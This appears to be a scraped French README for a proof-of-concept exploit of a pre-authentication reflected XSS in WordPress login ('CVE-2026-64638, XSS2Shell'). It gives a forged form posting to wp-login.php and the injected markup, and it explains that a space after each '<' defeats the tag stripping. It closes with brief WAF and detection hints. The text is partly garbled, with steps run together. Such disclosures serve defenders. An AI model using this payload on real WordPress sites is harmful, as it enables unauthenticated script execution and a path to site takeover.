
CVE-2026-64638 (XSS2shell) POC.
Preuve de concept d'une XSS réfléchie pré-authentification WordPress
Preuve de concept HTML en fichier unique pour le CVE-2026-64638 (XSS2Shell), une XSS par différentiel de parseur dans le cœur de WordPress. Démontre l'exécution de JavaScript non authentifié dans l'origine WordPress via une requête de connexion forgée.
strip_tags() vs wp_kses_post())POC.html dans un éditeur de texte.http://TARGET/wp-login.php dans l'action du formulaire par votre cible.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (ou alert()) se déclenche dans l'origine WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
L'espace après chaque < constitue l'exploit. Sans lui, wp_strip_all_tags() supprime tout.
%3C + espace blanc dans le champ log au niveau du WAF/périmètre.POST /wp-login.php où log contient un < encodé.